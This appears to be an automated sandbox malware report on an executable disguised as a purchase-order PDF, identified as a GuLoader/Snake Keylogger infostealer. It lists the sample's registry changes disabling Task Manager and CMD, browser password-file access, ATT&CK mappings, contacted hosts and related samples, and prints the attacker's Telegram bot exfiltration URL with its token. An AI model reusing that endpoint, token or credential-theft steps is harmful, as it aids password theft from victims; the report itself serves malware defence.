            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025CD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.0000000002578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3761
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3941
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00403C41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,SendMessageW,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetDlgItem,SetClassLongW,LdrInitializeThunk,SendMessageW,LdrInitializeThunk,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,LdrInitializeThunk,GetSystemMenu,EnableMenuItem,SendMessageW,LdrInitializeThunk,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,0_2_00403C41
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-090971819130-24_pdf.exe PID: 4796, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-090971819130-24_pdf.exe PID: 4796, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-090971819130-24_pdf.exe PID: 4796, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-090971819130-24_pdf.exe PID: 4796, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-090971819130-24_pdf.exe PID: 4796, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            31
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory215
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            3
            Obfuscated Files or Information
            Security Account Manager1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            21
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS21
            Security Software Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PURCHASE ORDER TRC-090971819130-24_pdf.exe55%ReversingLabsWin32.Trojan.Guloader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.208.238
            truefalse
              high
              drive.usercontent.google.com
              172.217.17.65
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.0000000002578000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.orgPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.usercontent.google.com/PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344704547.0000000002614000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344614634.00000000025E5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BCF000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://apis.google.comPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2289923775.00000000025E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/JPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.0000000002578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorPURCHASE ORDER TRC-090971819130-24_pdf.exefalse
                                                          high
                                                          http://api.telegram.orgPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032D8D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032F9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032DDD000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://api.telegram.org(-PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.usercontent.google.com/xsPURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344704547.0000000002614000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000003.2344614634.00000000025E5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndns.org/O5PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3314213089.00000000354E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032BF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      104.21.67.152
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      172.217.17.65
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      216.58.208.238
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      132.226.247.73
                                                                      checkip.dyndns.comUnited States
                                                                      16989UTMEMUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1578319
                                                                      Start date and time:2024-12-19 15:28:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 6m 44s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:5
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/8@6/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 95%
                                                                      • Number of executed functions: 154
                                                                      • Number of non-executed functions: 112
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                      TimeTypeDescription
                                                                      09:29:39API Interceptor346430x Sleep call for process: PURCHASE ORDER TRC-090971819130-24_pdf.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.22066776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                            D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                        urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                          104.21.67.152Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              132.226.247.73D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              checkip.dyndns.comOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              reallyfreegeoip.orgOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              api.telegram.org66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRU66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
